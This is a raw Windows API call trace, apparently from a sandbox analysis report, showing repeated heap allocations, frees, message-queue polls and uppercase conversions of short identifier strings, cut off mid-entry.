[0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.137] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0209.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0209.137] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0209.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0209.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.138] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.138] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.139] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0209.139] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.139] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.139] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.139] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa940 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.140] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.140] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.141] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.141] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.142] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0209.142] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0209.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0209.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0209.144] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0209.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.145] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.145] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.146] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.146] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.146] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.146] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.146] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.146] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.147] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.147] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.147] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.147] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.147] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.147] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.148] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.148] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.148] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.148] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.148] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.148] PeekMessageW 